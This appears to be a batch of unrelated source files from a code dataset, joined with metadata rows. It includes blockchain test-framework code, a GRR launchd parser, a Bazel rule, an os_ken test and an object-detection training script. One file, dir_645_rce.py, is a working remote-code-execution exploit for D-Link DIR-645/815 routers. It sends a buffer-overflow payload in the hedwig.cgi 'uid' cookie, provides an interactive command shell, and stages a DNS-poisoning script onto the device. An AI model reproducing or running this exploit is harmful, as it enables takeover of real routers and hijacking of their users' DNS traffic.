args.append("-connect=127.0.0.1:" + str(p2p_port(0)))
self.nodes.append(TestNode(i, self.options.cachedir, extra_args=[], rpchost=None, timewait=None, binary=None, stderr=None, mocktime=self.mocktime, coverage_dir=None))
self.nodes[i].args = args
self.start_node(i)
# Wait for RPC connections to be ready
for node in self.nodes:
node.wait_for_rpc_connection()
# Create a 200-block-long chain; each of the 4 first nodes
# gets 25 mature blocks and 25 immature.
# Note: To preserve compatibility with older versions of
# initialize_chain, only 4 nodes will generate coins.
#
# blocks are created with timestamps 10 minutes apart
# starting from 2010 minutes in the past
self.enable_mocktime()
block_time = self.mocktime - (201 * 10 * 60)
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(self.nodes, block_time)
self.nodes[peer].generate(1)
block_time += 10 * 60
# Must sync before next peer starts generating blocks
sync_blocks(self.nodes)
# Shut them down, and clean up cache directories:
self.stop_nodes()
self.nodes = []
self.disable_mocktime()
for i in range(MAX_NODES):
os.remove(log_filename(self.options.cachedir, i, "debug.log"))
os.remove(log_filename(self.options.cachedir, i, "db.log"))
os.remove(log_filename(self.options.cachedir, i, "peers.dat"))
os.remove(log_filename(self.options.cachedir, i, "fee_estimates.dat"))
for i in range(self.num_nodes):
from_dir = os.path.join(self.options.cachedir, "node" + str(i))
to_dir = os.path.join(self.options.tmpdir, "node" + str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(self.options.tmpdir, i) # Overwrite port/rpcport in bitcoin.conf
def _initialize_chain_clean(self):
"""Initialize empty blockchain for use by the test.
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization."""
for i in range(self.num_nodes):
initialize_datadir(self.options.tmpdir, i)
class ComparisonTestFramework(BitcoinTestFramework):
"""Test framework for doing p2p comparison testing
Sets up some likemeeeshared binaries:
- 1 binary: test binary
- 2 binaries: 1 test binary, 1 ref binary
- n>2 binaries: 1 test binary, n-1 ref binaries"""
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("LITECOIND", "likemeeeshared"),
help="likemeeeshared binary to test")
parser.add_option("--refbinary", dest="refbinary",
default=os.getenv("LITECOIND", "likemeeeshared"),
help="likemeeeshared binary to use for reference nodes (if any)")
def setup_network(self):
extra_args = [['-whitelist=127.0.0.1']] * self.num_nodes
if hasattr(self, "extra_args"):
extra_args = self.extra_args
self.add_nodes(self.num_nodes, extra_args,
binary=[self.options.testbinary] +
[self.options.refbinary] * (self.num_nodes - 1))
self.start_nodes()
class SkipTest(Exception):
"""This exception is raised to skip a test"""
def __init__(self, message):
self.message = message
| 42.157676 | 310 | 0.617569 |
4a1e4ea245c9e51a35ab7f088a0150366bf5f840 | 2,849 | py | Python | grr/core/grr_response_core/lib/parsers/osx_launchd.py | khanhgithead/grr | 8ad8a4d2c5a93c92729206b7771af19d92d4f915 | [
"Apache-2.0"
] | 4,238 | 2015-01-01T15:34:50.000Z | 2022-03-31T08:18:05.000Z | grr/core/grr_response_core/lib/parsers/osx_launchd.py | khanhgithead/grr | 8ad8a4d2c5a93c92729206b7771af19d92d4f915 | [
"Apache-2.0"
] | 787 | 2015-01-02T21:34:24.000Z | 2022-03-02T13:26:38.000Z | grr/core/grr_response_core/lib/parsers/osx_launchd.py | khanhgithead/grr | 8ad8a4d2c5a93c92729206b7771af19d92d4f915 | [
"Apache-2.0"
] | 856 | 2015-01-02T02:50:11.000Z | 2022-03-31T11:11:53.000Z | #!/usr/bin/env python
# Copyright 2012 Google Inc. All Rights Reserved.
"""Parser for OSX launchd jobs."""
import re
from typing import Iterator
from grr_response_core.lib import parsers
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import paths as rdf_paths
from grr_response_core.lib.rdfvalues import standard as rdf_standard
class OSXLaunchdJobDict(object):
"""Cleanup launchd jobs reported by the service management framework.
Exclude some rubbish like logged requests that aren't real jobs (see
launchctl man page). Examples:
Exclude 0x7f8759d30310.anonymous.launchd
Exclude 0x7f8759d1d200.mach_init.crash_inspector
Keep [0x0-0x21021].com.google.GoogleDrive
We could probably just exclude anything starting with a memory address, but
I'm being more specific here as a tradeoff between sensible results and places
for malware to hide.
"""
def __init__(self, launchdjobs):
"""Initialize.
Args:
launchdjobs: NSCFArray of NSCFDictionarys containing launchd job data from
the ServiceManagement framework.
"""
self.launchdjobs = launchdjobs
self._filter_regexes = [
re.compile(r"^0x[a-z0-9]+\.anonymous\..+$"),
re.compile(r"^0x[a-z0-9]+\.mach_init\.(crash_inspector|Inspector)$"),
]
def Parse(self):
"""Parse the list of jobs and yield the good ones."""
for item in self.launchdjobs:
if not self.FilterItem(item):
yield item
def FilterItem(self, launchditem):
"""Should this job be filtered.
Args:
launchditem: job NSCFDictionary
Returns:
True if the item should be filtered (dropped)
"""
for regex in self._filter_regexes:
if regex.match(launchditem.get("Label", "")):
return True
return False
class DarwinPersistenceMechanismsParser(
parsers.SingleResponseParser[rdf_standard.PersistenceFile]):
"""Turn various persistence objects into PersistenceFiles."""
output_types = [rdf_standard.PersistenceFile]
supported_artifacts = ["DarwinPersistenceMechanisms"]
def ParseResponse(
self,
knowledge_base: rdf_client.KnowledgeBase,
response: rdfvalue.RDFValue,
) -> Iterator[rdf_standard.PersistenceFile]:
"""Convert persistence collector output to downloadable rdfvalues."""
pathspec = None
if isinstance(response, rdf_client.OSXServiceInformation):
if response.program:
pathspec = rdf_paths.PathSpec(
path=response.program, pathtype=rdf_paths.PathSpec.PathType.UNSET)
elif response.args:
pathspec = rdf_paths.PathSpec(
path=response.args[0], pathtype=rdf_paths.PathSpec.PathType.UNSET)
if pathspec is not None:
yield rdf_standard.PersistenceFile(pathspec=pathspec)
| 31.655556 | 80 | 0.726571 |
4a1e4f1063e437dcb47dac87415467184385880d | 409 | bzl | Python | bazel/ray.bzl | FieldMrFive/ray | a22d6ef95594a3b95fac5b2eb17f7f21be2888e8 | [
"Apache-2.0"
] | 3 | 2019-05-01T04:31:20.000Z | 2021-03-01T09:25:36.000Z | bazel/ray.bzl | collinswei/ray | 2e30f7ba386e716bf80f019dcd473b67d83abb95 | [
"Apache-2.0"
] | 2 | 2019-01-28T00:31:25.000Z | 2019-11-26T16:57:06.000Z | bazel/ray.bzl | collinswei/ray | 2e30f7ba386e716bf80f019dcd473b67d83abb95 | [
"Apache-2.0"
] | 2 | 2020-03-26T16:32:08.000Z | 2021-02-05T17:04:11.000Z | load("@com_github_google_flatbuffers//:build_defs.bzl", "flatbuffer_library_public")
def flatbuffer_py_library(name, srcs, outs, out_prefix, includes = [], include_paths = []):
flatbuffer_library_public(
name = name,
srcs = srcs,
outs = outs,
language_flag = "-p",
out_prefix = out_prefix,
include_paths = include_paths,
includes = includes,
)
| 31.461538 | 91 | 0.643032 |
4a1e4f489d4286312d9f8c34644e531a8a6981a9 | 2,237 | py | Python | os_ken/tests/unit/cmd/test_manager.py | rolaya/os-ken | 10009e41539c737c7c423f13e4f5bc5f46d219ff | [
"Apache-2.0"
] | 1 | 2019-04-24T04:01:07.000Z | 2019-04-24T04:01:07.000Z | os_ken/tests/unit/cmd/test_manager.py | anlaneg/os-ken | 379a7694c3129cc0156343af71f4fca8830d9de5 | [
"Apache-2.0"
] | null | null | null | os_ken/tests/unit/cmd/test_manager.py | anlaneg/os-ken | 379a7694c3129cc0156343af71f4fca8830d9de5 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2013,2014 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2013,2014 YAMAMOTO Takashi <yamamoto at valinux co jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import unittest
import mock
from nose.tools import eq_, raises
try:
# Python 3
from imp import reload
except ImportError:
# Python 2
pass
from os_ken.cmd.manager import main
class Test_Manager(unittest.TestCase):
"""Test osken-manager command
"""
def __init__(self, methodName):
super(Test_Manager, self).__init__(methodName)
def setUp(self):
pass
def tearDown(self):
pass
@raises(SystemExit)
@mock.patch('sys.argv', new=['osken-manager', '--version'])
def test_version(self):
main()
@raises(SystemExit)
@mock.patch('sys.argv', new=['osken-manager', '--help'])
def test_help(self):
main()
@staticmethod
def _reset_globals():
# hack to reset globals like SERVICE_BRICKS.
# assumption: this is the only test which actually starts OSKenApp.
import os_ken.base.app_manager
import os_ken.ofproto.ofproto_protocol
reload(os_ken.base.app_manager)
reload(os_ken.ofproto.ofproto_protocol)
@mock.patch('sys.argv', new=['osken-manager', '--verbose',
'os_ken.tests.unit.cmd.dummy_app'])
def test_no_services(self):
self._reset_globals()
main()
self._reset_globals()
@mock.patch('sys.argv', new=['osken-manager', '--verbose',
'os_ken.tests.unit.cmd.dummy_openflow_app'])
def test_openflow_app(self):
self._reset_globals()
main()
self._reset_globals()
| 28.679487 | 77 | 0.664283 |
4a1e4f530d76885c544a70687c8b26c8ff21048d | 5,058 | py | Python | EXP/dir_645_rce.py | Octoberr/swm0920 | 8f05a6b91fc205960edd57f9076facec04f49a1a | [
"Apache-2.0"
] | 2 | 2019-05-19T11:54:26.000Z | 2019-05-19T12:03:49.000Z | EXP/dir_645_rce.py | Octoberr/swm0920 | 8f05a6b91fc205960edd57f9076facec04f49a1a | [
"Apache-2.0"
] | 1 | 2020-11-27T07:55:15.000Z | 2020-11-27T07:55:15.000Z | EXP/dir_645_rce.py | Octoberr/swm0920 | 8f05a6b91fc205960edd57f9076facec04f49a1a | [
"Apache-2.0"
] | 2 | 2021-09-06T18:06:12.000Z | 2021-12-31T07:44:43.000Z | #coding: utf-8
'''
@Test list:
DIR 645 A1 1.01
DIR 815 1.01
'''
import string
import random
import datetime
import struct
from routelib import *
from exp_template import *
class dir_645_rce(Exploit):
def __init__(self, url, taskid=0, targetid=0, cmd_connect='', data_redirect='', dns_server='', proxies={}):
self.url = url
self.taskid = taskid
self.targetid = targetid
self.cmd_connect = cmd_connect
self.data_redirect = data_redirect
self.dns_server = dns_server
self.proxies = proxies
self.log_data = []
self.shell_data = []
def meta_info(self):
return {
'name': 'dir_645_rce',
'author': 'z',
'date': '2018-03-15',
'attack_type': 'RCE',
'app_type': 'Router', #路由器为Router
'app_name': 'D-Link',
'min_version': '',
'max_version': '',
'version_list': ['DIR-645'], #min_version,max_version 和 verion_list 二者必选其一
'description': 'Module exploits D-Link DIR-645 and DIR-600 and DIR-815 and DIR-300 buffer overflow that leads to remote code execution',
'reference':[
'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008',
'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000',
'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt',
'https://www.exploit-db.com/exploits/27283/'
], #参考文档
}
def exploit(self):
if self.check():
self.report("Target is vulnerable")
self.report("DNS Poisoning...")
#self.command_stager()
self.dns_poison(self.dns_server)
else:
self.report("Target is not vulnerable",Level.warming)
self.report('Exploit is complete')
def dns_poison(self,new_dns_server='192.168.220.5', dns_conf_path='/var/servd/DNS.conf', restart_cmd='"dnsmasq -C /var/servd/DNS.conf"'):
every_send = 30
completed = 0
dns_handle = dns.dnsmasq_poison(self.dns_server)
#dns_handle.set_debug_mode()
dns_shell = dns_handle.get_dns_poison_shell_cmds(every_send)
wf = dns_shell['script_name']
total_size = dns_shell['size']
for cmd in dns_shell['cmds']:
completed += every_send
self.execute(cmd)
if completed >= total_size:
completed = total_size
self.report('Command Stager progress - %.2f%% done (%d/%d) bytes' % (float(completed)/total_size*100, completed, total_size))
chmod_dns_shell = 'chmod +x %s && echo' % wf
#execute_dns_shell = '%s %s %s %s && echo' % (wf,dns_conf_path,new_dns_server,restart_cmd)
execute_dns_shell = '%s && echo' % (wf)
self.report('Command: "%s" done.' % chmod_dns_shell)
self.execute(chmod_dns_shell)
#print execute_dns_shell
self.report('Command: "%s" done.' % execute_dns_shell)
result = self.execute(execute_dns_shell)
def command_stager(self):
while True:
cmd = raw_input("# ")
if cmd in ['exit', 'quit']:
return
self.report(self.execute(cmd))
def execute(self, cmd):
req = session()
libcbase = 0x2aaf8000
system = 0x000531FF
calcsystem = 0x000158C8
callsystem = 0x000159CC
shellcode = random_text(973)
shellcode += struct.pack("<I", libcbase + system)
shellcode += random_text(16)
shellcode += struct.pack("<I", libcbase + callsystem)
shellcode += random_text(12)
shellcode += struct.pack("<I", libcbase + calcsystem)
shellcode += random_text(16)
shellcode += cmd
url = "{}/hedwig.cgi".format(self.url)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
cookies = {'uid': shellcode}
data = random_text(7) + "=" + random_text(7)
response = None
try:
response = req.post(url=url, headers=headers, data=data, cookies=cookies)
except requests.Timeout as err:
pass
self.report(err.message,Level.warming)
except requests.ConnectionError as err:
pass
self.report(err.message,Level.warming)
if response is None:
return ""
return response.text[response.text.find("</hedwig>") + len("</hedwig>"):].strip()
def check(self):
fingerprint = random_text(10)
cmd = "echo {}".format(fingerprint)
response = self.execute(cmd)
if fingerprint in response:
return True
return False
if __name__ == "__main__":
import sys
if len(sys.argv) < 3:
print 'Usage(e.g.): dir_645_rce.py http://192.168.0.1:8080 119.6.6.6'
exit(0)
e = dir_645_rce(sys.argv[1],dns_server=sys.argv[2])
e.exploit()
| 35.619718 | 148 | 0.580071 |
4a1e500d72f09c964cd9388bb3ea947106d64d3c | 739 | py | Python | tools/paconn-cli/paconn/completer.py | amoedo/PowerPlatformConnectors | dbf436b3a2cc02a4231b60b232a696e734d81c55 | [
"MIT"
] | 454 | 2019-05-07T17:58:24.000Z | 2022-03-31T23:20:04.000Z | tools/paconn-cli/paconn/completer.py | amoedo/PowerPlatformConnectors | dbf436b3a2cc02a4231b60b232a696e734d81c55 | [
"MIT"
] | 830 | 2019-05-11T10:32:44.000Z | 2022-03-31T18:23:42.000Z | tools/paconn-cli/paconn/completer.py | amoedo/PowerPlatformConnectors | dbf436b3a2cc02a4231b60b232a696e734d81c55 | [
"MIT"
] | 753 | 2019-05-11T09:49:56.000Z | 2022-03-31T15:53:52.000Z | # -----------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# -----------------------------------------------------------------------------
"""
Defines argument completer
"""
# pylint: disable=too-few-public-methods
class Completer:
"""
Argument completer object
"""
def __init__(self, func):
self.func = func
def __call__(self, **kwargs):
namespace = kwargs['parsed_args']
prefix = kwargs['prefix']
cmd = namespace._cmd # pylint: disable=protected-access
return self.func(cmd, prefix, namespace)
| 29.56 | 79 | 0.525034 |
4a1e55336c7da63d00b8583a50dfebd634cf3238 | 2,390 | py | Python | lerp_finger_from_serial.py | LittleNyanCat/pygloves | d5881bf3eaf90a185243abe3e366005066c656cd | [
"MIT"
] | 2 | 2021-12-30T18:30:56.000Z | 2022-03-09T10:48:57.000Z | lerp_finger_from_serial.py | LittleNyanCat/pygloves | d5881bf3eaf90a185243abe3e366005066c656cd | [
"MIT"
] | null | null | null | lerp_finger_from_serial.py | LittleNyanCat/pygloves | d5881bf3eaf90a185243abe3e366005066c656cd | [
"MIT"
] | 1 | 2022-03-26T13:46:54.000Z | 2022-03-26T13:46:54.000Z | import multiprocessing
import re
import serial
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import animation
import bone
import serial_utils as s
# Use device manager to find the Arduino's serial port.
COM_PORT = "COM4"
MAX_SERIAL_VALUE = 4095 #maximum expected value coming from serial. set to 1023 if using an older arduino instead of a esp32
RESET_SCALE = True
LEGACY_DECODE = False # If false, will use alpha encodings
q = multiprocessing.Queue()
# Plot Setup
fig = plt.figure("Serial Finger Plots")
ax = fig.add_subplot(111, projection='3d')
plt.subplots_adjust(left=0.25, bottom=0.25)
ax.set_xlabel('X [m]')
ax.set_ylabel('Y [m]')
ax.set_zlabel('Z [m]')
# Set the scale once
ax.set_xlim3d([-0.05, 0.1])
ax.set_ylim3d([-0.1, 0.1])
ax.set_zlim3d([0, 0.2])
ax.view_init(elev=25, azim=-150)
# ------------ Serial Setup ---------------
def serial_worker(q, COM_PORT):
ser = serial.Serial(COM_PORT,'115200', timeout=1) # open serial port
print("Listening on "+COM_PORT)
while True:
try:
# Read from serial
read = ser.readline()
if LEGACY_DECODE:
fingers = s.decode_legacy_serial(read)
else:
fingers = s.decode_alpha_serial(read)
# Add the decoded values to the queue
q.put(fingers)
except KeyboardInterrupt:
print("Quitting thread...")
ser.close()
quit()
def animate(i):
fingers = [0,0,0,0,0]
while not(q.empty()):
fingers = list(q.get())
# Plot
ax.clear()
ax.set_xlabel('X [mm]')
ax.set_ylabel('Y [mm]')
ax.set_zlabel('Z [mm]')
if (RESET_SCALE == True):
ax.set_xlim3d([-0.05, 0.1])
ax.set_ylim3d([-0.1, 0.1])
ax.set_zlim3d([0, 0.2])
# Turn finger values into Lerp Vals
thumb_val = fingers[0] / MAX_SERIAL_VALUE
index_val = fingers[1] / MAX_SERIAL_VALUE
middle_val = fingers[2] / MAX_SERIAL_VALUE
ring_val = fingers[3] / MAX_SERIAL_VALUE
pinky_val = fingers[4] / MAX_SERIAL_VALUE
print("Fingers", fingers)
fingers = [thumb_val, index_val, middle_val, ring_val, pinky_val]
# Lerp the right hand
points = bone.lerp_fingers(fingers, bone.right_open_pose, bone.right_fist_pose)
# Plot the Points
bone.plot_steam_hand(points, "Lerped Pose", ax)
if __name__ == "__main__":
p = multiprocessing.Process(target=serial_worker, args=(q,COM_PORT, ), daemon=True)
p.start()
anim = animation.FuncAnimation(fig, animate, blit=False, interval=1)
try:
plt.show()
except KeyboardInterrupt:
quit() | 27.471264 | 124 | 0.707531 |
4a1e56c1f83b33a761fc2ea39cf6735e926d2346 | 8,962 | py | Python | couchbase/transcoder.py | couchbase/couchbase-python-client | 99ec055835f5aef0cd07905497b3ab4bb3cbbc32 | [
"Apache-2.0"
] | 189 | 2015-01-07T18:34:31.000Z | 2022-03-21T17:41:56.000Z | couchbase/transcoder.py | couchbase/couchbase-python-client | 99ec055835f5aef0cd07905497b3ab4bb3cbbc32 | [
"Apache-2.0"
] | 24 | 2015-05-19T14:00:16.000Z | 2022-03-16T22:01:30.000Z | couchbase/transcoder.py | couchbase/couchbase-python-client | 99ec055835f5aef0cd07905497b3ab4bb3cbbc32 | [
"Apache-2.0"
] | 60 | 2015-03-10T22:12:50.000Z | 2022-03-07T21:57:40.000Z | import json
import pickle
from typing import Any, Tuple, Union
from abc import ABC, abstractmethod
from couchbase.exceptions import ValueFormatException
from couchbase_core._libcouchbase import (Transcoder, FMT_JSON,
FMT_BYTES, FMT_UTF8, FMT_PICKLE,
FMT_LEGACY_MASK, FMT_COMMON_MASK)
UNIFIED_FORMATS = (FMT_JSON, FMT_BYTES, FMT_UTF8, FMT_PICKLE)
LEGACY_FORMATS = tuple([x & FMT_LEGACY_MASK for x in UNIFIED_FORMATS])
COMMON_FORMATS = tuple([x & FMT_COMMON_MASK for x in UNIFIED_FORMATS])
COMMON2UNIFIED = {}
LEGACY2UNIFIED = {}
for fl in UNIFIED_FORMATS:
COMMON2UNIFIED[fl & FMT_COMMON_MASK] = fl
LEGACY2UNIFIED[fl & FMT_LEGACY_MASK] = fl
def get_decode_format(flags):
"""
Returns a tuple of format, recognized
"""
c_flags = flags & FMT_COMMON_MASK
l_flags = flags & FMT_LEGACY_MASK
if c_flags:
# if unknown format, default to FMT_BYTES
return COMMON2UNIFIED.get(c_flags, FMT_BYTES)
else:
# if unknown format, default to FMT_BYTES
return LEGACY2UNIFIED.get(l_flags, FMT_BYTES)
class Transcoder(ABC):
"""Interface a Custom Transcoder must implement
"""
@abstractmethod
def encode_value(self, # type: "Transcoder"
value # type: Any
) -> Tuple[bytes, int]:
pass
@abstractmethod
def decode_value(self, # type: "Transcoder"
value, # type: bytes
flags # type: int
) -> Any:
pass
class JSONTranscoder(Transcoder):
def encode_value(self, # type: "JSONTranscoder"
value, # type: Any
) -> Tuple[bytes, int]:
if isinstance(value, str):
format = FMT_JSON
elif isinstance(value, (bytes, bytearray)):
raise ValueError(
"The JSONTranscoder (default transcoder) does not support binary data.")
elif isinstance(value, (list, tuple, dict, bool, int, float)) or value is None:
format = FMT_JSON
else:
raise ValueFormatException(
"Unrecognized value type {}".format(type(value)))
if format != FMT_JSON:
raise ValueFormatException("Unrecognized format {}".format(format))
return json.dumps(value, ensure_ascii=False).encode("utf-8"), FMT_JSON
def decode_value(self, # type: "JSONTranscoder"
value, # type: bytes
flags # type: int
) -> Any:
format = get_decode_format(flags)
if format == FMT_BYTES:
raise ValueFormatException(
"The JSONTranscoder (default transcoder) does not support binary format")
elif format == FMT_UTF8:
raise ValueFormatException(
"The JSONTranscoder (default transcoder) does not support string format")
elif format == FMT_JSON:
return json.loads(value.decode('utf-8'))
else:
raise ValueFormatException(
"Unrecognized format provided: {}".format(format))
class RawJSONTranscoder(Transcoder):
def encode_value(self, # type: "RawJSONTranscoder"
value # type: Union[str,bytes,bytearray]
) -> Tuple[bytes, int]:
if isinstance(value, str):
return value.encode("utf-8"), FMT_JSON
elif isinstance(value, (bytes, bytearray)):
if isinstance(value, bytearray):
value = bytes(value)
return value, FMT_JSON
else:
raise ValueFormatException(
"Only binary and string data supported by RawJSONTranscoder")
def decode_value(self, # type: "RawJSONTranscoder"
value, # type: bytes
flags # type: int
) -> Union[str, bytes]:
format = get_decode_format(flags)
if format == FMT_BYTES:
raise ValueFormatException(
"Binary format type not supported by RawJSONTranscoder")
elif format == FMT_UTF8:
raise ValueFormatException(
"String format type not supported by RawJSONTranscoder")
elif format == FMT_JSON:
if isinstance(value, str):
return value.decode("utf-8")
elif isinstance(value, (bytes, bytearray)):
if isinstance(value, bytearray):
value = bytes(value)
return value
else:
raise ValueFormatException(
"Only binary and string data supported by RawJSONTranscoder")
else:
raise ValueError("Unexpected flags value.")
class RawStringTranscoder(Transcoder):
def encode_value(self, # type: "RawStringTranscoder"
value # type: str
) -> Tuple[bytes, int]:
if isinstance(value, str):
return value.encode("utf-8"), FMT_UTF8
else:
raise ValueFormatException(
"Only string data supported by RawStringTranscoder")
def decode_value(self, # type: "RawStringTranscoder"
value, # type: bytes
flags # type: int
) -> Union[str, bytes]:
format = get_decode_format(flags)
if format == FMT_BYTES:
raise ValueFormatException(
"Binary format type not supported by RawStringTranscoder")
elif format == FMT_UTF8:
return value.decode("utf-8")
elif format == FMT_JSON:
raise ValueFormatException(
"JSON format type not supported by RawStringTranscoder")
else:
raise ValueError("Unexpected flags value.")
class RawBinaryTranscoder(Transcoder):
def encode_value(self, # type: "RawBinaryTranscoder"
value # type: Union[bytes,bytearray]
) -> Tuple[bytes, int]:
if isinstance(value, (bytes, bytearray)):
if isinstance(value, bytearray):
value = bytes(value)
return value, FMT_BYTES
else:
raise ValueFormatException(
"Only binary data supported by RawBinaryTranscoder")
def decode_value(self, # type: "RawBinaryTranscoder"
value, # type: bytes
flags # type: int
) -> bytes:
format = get_decode_format(flags)
if format == FMT_BYTES:
if isinstance(value, bytearray):
value = bytes(value)
return value
elif format == FMT_UTF8:
raise ValueFormatException(
"String format type not supported by RawBinaryTranscoder")
elif format == FMT_JSON:
raise ValueFormatException(
"JSON format type not supported by RawBinaryTranscoder")
else:
raise ValueError("Unexpected flags value.")
class LegacyTranscoder(Transcoder):
def encode_value(self, # type: "LegacyTranscoder"
value # type: Any
) -> Tuple[bytes, int]:
if isinstance(value, str):
format = FMT_UTF8
elif isinstance(value, (bytes, bytearray)):
format = FMT_BYTES
elif isinstance(value, (list, tuple, dict, bool, int, float)) or value is None:
format = FMT_JSON
else:
format = FMT_PICKLE
if format == FMT_BYTES:
if isinstance(value, bytes):
pass
elif isinstance(value, bytearray):
value = bytes(value)
else:
raise ValueFormatException("Expected bytes")
return value, format
elif format == FMT_UTF8:
return value.encode('utf-8'), format
elif format == FMT_PICKLE:
return pickle.dumps(value), FMT_PICKLE
elif format == FMT_JSON:
return json.dumps(value, ensure_ascii=False).encode("utf-8"), FMT_JSON
else:
raise ValueFormatException("Unrecognized format {}".format(format))
def decode_value(self, # type: "LegacyTranscoder"
value, # type: bytes
flags # type: int
) -> Any:
format = get_decode_format(flags)
if format == FMT_BYTES:
return value
elif format == FMT_UTF8:
return value.decode("utf-8")
elif format == FMT_JSON:
try:
return json.loads(value.decode('utf-8'))
except Exception:
# if error encountered, assume return bytes
return value
elif format == FMT_PICKLE:
return pickle.loads(value)
else:
# default to returning bytes
return value
| 33.818868 | 89 | 0.564048 |
4a1e575e18ccd76104a0fbd3f3120e8d4a2705b7 | 6,039 | py | Python | mlx/od/archive/fastai/train.py | lewfish/mlx | 027decf72bf9d96de3b4de13dcac7b352b07fd63 | [
"Apache-2.0"
] | null | null | null | mlx/od/archive/fastai/train.py | lewfish/mlx | 027decf72bf9d96de3b4de13dcac7b352b07fd63 | [
"Apache-2.0"
] | null | null | null | mlx/od/archive/fastai/train.py | lewfish/mlx | 027decf72bf9d96de3b4de13dcac7b352b07fd63 | [
"Apache-2.0"
] | null | null | null | import json
import uuid
from os.path import join, isdir, dirname
import shutil
import tempfile
import os
import numpy as np
import click
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import fastai
from fastai.vision import (
get_annotations, ObjectItemList, get_transforms,
bb_pad_collate, URLs, untar_data, imagenet_stats, flip_affine)
from fastai.basic_train import Learner
import torch
from torch import nn, Tensor
from fastai.callback import CallbackHandler
from fastai.callbacks import TrackEpochCallback
from fastai.core import ifnone
from fastai.torch_core import OptLossFunc, OptOptimizer, Optional, Tuple, Union
from mlx.od.metrics import CocoMetric
from mlx.od.callbacks import (
MyCSVLogger, SyncCallback, TensorboardLogger,
SubLossMetric, MySaveModelCallback)
from mlx.od.data import setup_output_dir, build_databunch
from mlx.od.config import load_config
from mlx.od.boxlist import BoxList, to_box_pixel
from mlx.od.model import build_model
from mlx.filesystem.utils import sync_to_dir
from mlx.od.fcos.model import FCOS
from mlx.od.plot import build_plotter
# Modified from fastai to handle model which only computes loss when targets
# are passed in, and only computes output otherwise. This should run faster
# thanks to not having to run the decoder and NMS during training, and not
# computing the loss for the validation which is not a great metric anyway.
# This also converts the input format.
def loss_batch(model:nn.Module, xb:Tensor, yb:Tensor, loss_func:OptLossFunc=None,
opt:OptOptimizer=None,
cb_handler:Optional[CallbackHandler]=None)->Tuple[Union[Tensor,int,float,str]]:
"Calculate loss and metrics for a batch, call out to callbacks as necessary."
cb_handler = ifnone(cb_handler, CallbackHandler())
device = xb.device
# Translate from fastai box format to torchvision.
batch_sz = len(xb)
images = xb
targets = []
for i in range(batch_sz):
boxes = yb[0][i]
labels = yb[1][i]
boxes = to_box_pixel(boxes, *images[0].shape[1:3])
targets.append(BoxList(boxes, labels=labels))
out = None
loss = torch.Tensor([0.0]).to(device=device)
if model.training:
loss_dict = model(images, targets)
loss = loss_dict['total_loss']
cb_handler.state_dict['loss_dict'] = loss_dict
else:
out = model(images)
out = cb_handler.on_loss_begin(out)
if opt is not None:
loss,skip_bwd = cb_handler.on_backward_begin(loss)
if not skip_bwd: loss.backward()
if not cb_handler.on_backward_end(): opt.step()
if not cb_handler.on_step_end(): opt.zero_grad()
return loss.detach().cpu()
@click.command()
@click.argument('config_path')
@click.argument('opts', nargs=-1)
def train(config_path, opts):
tmp_dir_obj = tempfile.TemporaryDirectory()
tmp_dir = tmp_dir_obj.name
cfg = load_config(config_path, opts)
print(cfg)
# Setup data
databunch, full_databunch = build_databunch(cfg, tmp_dir)
output_dir = setup_output_dir(cfg, tmp_dir)
print(full_databunch)
plotter = build_plotter(cfg)
if not cfg.lr_find_mode and not cfg.predict_mode:
plotter.plot_data(databunch, output_dir)
# Setup model
num_labels = databunch.c
model = build_model(cfg, num_labels)
metrics = [CocoMetric(num_labels)]
learn = Learner(databunch, model, path=output_dir, metrics=metrics)
fastai.basic_train.loss_batch = loss_batch
best_model_path = join(output_dir, 'best_model.pth')
last_model_path = join(output_dir, 'last_model.pth')
# Train model
callbacks = [
MyCSVLogger(learn, filename='log'),
SubLossMetric(learn, model.subloss_names)
]
if cfg.output_uri.startswith('s3://'):
callbacks.append(
SyncCallback(output_dir, cfg.output_uri, cfg.solver.sync_interval))
if cfg.model.init_weights:
device = next(model.parameters()).device
model.load_state_dict(
torch.load(cfg.model.init_weights, map_location=device))
if not cfg.predict_mode:
if cfg.overfit_mode:
learn.fit_one_cycle(cfg.solver.num_epochs, cfg.solver.lr, callbacks=callbacks)
torch.save(learn.model.state_dict(), best_model_path)
learn.model.eval()
print('Validating on training set...')
learn.validate(full_databunch.train_dl, metrics=metrics)
else:
tb_logger = TensorboardLogger(learn, 'run')
tb_logger.set_extra_args(
model.subloss_names, cfg.overfit_mode)
extra_callbacks = [
MySaveModelCallback(
learn, best_model_path, monitor='coco_metric', every='improvement'),
MySaveModelCallback(learn, last_model_path, every='epoch'),
TrackEpochCallback(learn),
]
callbacks.extend(extra_callbacks)
if cfg.lr_find_mode:
learn.lr_find()
learn.recorder.plot(suggestion=True, return_fig=True)
lr = learn.recorder.min_grad_lr
print('lr_find() found lr: {}'.format(lr))
exit()
learn.fit_one_cycle(cfg.solver.num_epochs, cfg.solver.lr, callbacks=callbacks)
print('Validating on full validation set...')
learn.validate(full_databunch.valid_dl, metrics=metrics)
else:
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model.load_state_dict(
torch.load(join(output_dir, 'best_model.pth'), map_location=device))
model.eval()
plot_dataset = databunch.train_ds
print('Plotting predictions...')
